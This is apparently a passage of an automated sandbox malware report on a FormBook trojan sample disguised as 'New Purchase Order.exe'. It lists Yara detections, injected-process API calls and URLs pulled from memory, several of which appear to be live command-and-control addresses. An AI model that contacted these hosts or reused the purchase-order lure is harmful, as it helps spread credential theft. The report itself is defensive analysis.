            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 09 Sep 2024 02:54:21 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 09 Sep 2024 02:54:23 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: setupugc.exe, 00000011.00000002.4112456393.00000000042D4000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.0000000003134000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2196442101.0000000039054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000573E000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000459E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000573E000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000459E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: New Purchase Order.exe, 00000000.00000002.1694702784.0000000002BD3000.00000004.00000800.00020000.00000000.sdmp, ibDqDkseW.exe, 00000009.00000002.1833355900.0000000003303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: kdFPsEWDpy.exe, 00000014.00000002.4113419509.00000000051D8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jyourwd.store
            Source: kdFPsEWDpy.exe, 00000014.00000002.4113419509.00000000051D8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jyourwd.store/6ua2/
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmp, New Purchase Order.exe, 00000000.00000002.1700031983.0000000005354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: New Purchase Order.exe, 00000000.00000002.1700304681.0000000006B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setupugc.exe, 00000011.00000002.4112456393.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000390E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000541A000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000011.00000002.4114135520.0000000006730000.00000004.00000800.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000427A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fe3e9h.com:9009/register
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000541A000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000011.00000002.4114135520.0000000006730000.00000004.00000800.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000427A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?a06b4d1659d3d0d2e58179ddfe478d25
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oa
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033n
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setupugc.exe, 00000011.00000003.2085690031.0000000008154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: setupugc.exe, 00000011.00000002.4112456393.0000000004F64000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000011.00000002.4114135520.0000000006730000.00000004.00000800.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.0000000003DC4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
            Source: kdFPsEWDpy.exe, 00000014.00000002.4111864614.0000000003DC4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
            Source: setupugc.exe, 00000011.00000002.4112456393.0000000004F64000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000011.00000002.4114135520.0000000006730000.00000004.00000800.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.0000000003DC4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
            Source: setupugc.exe, 00000011.00000002.4114247706.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: setupugc.exe, 00000011.00000002.4112456393.000000000491C000.00000004.10000000.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111864614.000000000377C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.masteriocp.online/wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJS

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: New Purchase Order.exe
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0042C593 NtClose,8_2_0042C593
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172B60 NtClose,LdrInitializeThunk,8_2_01172B60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01172DF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01172C70
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011735C0 NtCreateMutant,LdrInitializeThunk,8_2_011735C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01174340 NtSetContextThread,8_2_01174340
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01174650 NtSuspendThread,8_2_01174650
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172B80 NtQueryInformationFile,8_2_01172B80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172BA0 NtEnumerateValueKey,8_2_01172BA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172BF0 NtAllocateVirtualMemory,8_2_01172BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172BE0 NtQueryValueKey,8_2_01172BE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172AB0 NtWaitForSingleObject,8_2_01172AB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172AD0 NtReadFile,8_2_01172AD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172AF0 NtWriteFile,8_2_01172AF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172D10 NtMapViewOfSection,8_2_01172D10
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172D00 NtSetInformationFile,8_2_01172D00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172D30 NtUnmapViewOfSection,8_2_01172D30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172DB0 NtEnumerateKey,8_2_01172DB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172DD0 NtDelayExecution,8_2_01172DD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172C00 NtQueryInformationProcess,8_2_01172C00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172C60 NtCreateKey,8_2_01172C60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172CA0 NtQueryInformationToken,8_2_01172CA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172CC0 NtQueryVirtualMemory,8_2_01172CC0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172CF0 NtOpenProcess,8_2_01172CF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172F30 NtCreateSection,8_2_01172F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172F60 NtCreateProcessEx,8_2_01172F60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172F90 NtProtectVirtualMemory,8_2_01172F90
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172FB0 NtResumeThread,8_2_01172FB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172FA0 NtQuerySection,8_2_01172FA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172FE0 NtCreateFile,8_2_01172FE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172E30 NtWriteVirtualMemory,8_2_01172E30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172E80 NtReadVirtualMemory,8_2_01172E80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172EA0 NtAdjustPrivilegesToken,8_2_01172EA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01172EE0 NtQueueApcThread,8_2_01172EE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01173010 NtOpenDirectoryObject,8_2_01173010
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01173090 NtSetValueKey,8_2_01173090
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011739B0 NtGetContextThread,8_2_011739B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01173D10 NtOpenProcessToken,8_2_01173D10
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01173D70 NtOpenThread,8_2_01173D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03934340 NtSetContextThread,LdrInitializeThunk,17_2_03934340
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03934650 NtSuspendThread,LdrInitializeThunk,17_2_03934650
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932BA0 NtEnumerateValueKey,LdrInitializeThunk,17_2_03932BA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932BF0 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_03932BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932BE0 NtQueryValueKey,LdrInitializeThunk,17_2_03932BE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932B60 NtClose,LdrInitializeThunk,17_2_03932B60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932AD0 NtReadFile,LdrInitializeThunk,17_2_03932AD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932AF0 NtWriteFile,LdrInitializeThunk,17_2_03932AF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932FB0 NtResumeThread,LdrInitializeThunk,17_2_03932FB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932FE0 NtCreateFile,LdrInitializeThunk,17_2_03932FE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932F30 NtCreateSection,LdrInitializeThunk,17_2_03932F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03932E80 NtReadVirtualMemory,LdrInitializeThunk,17_2_03932E80
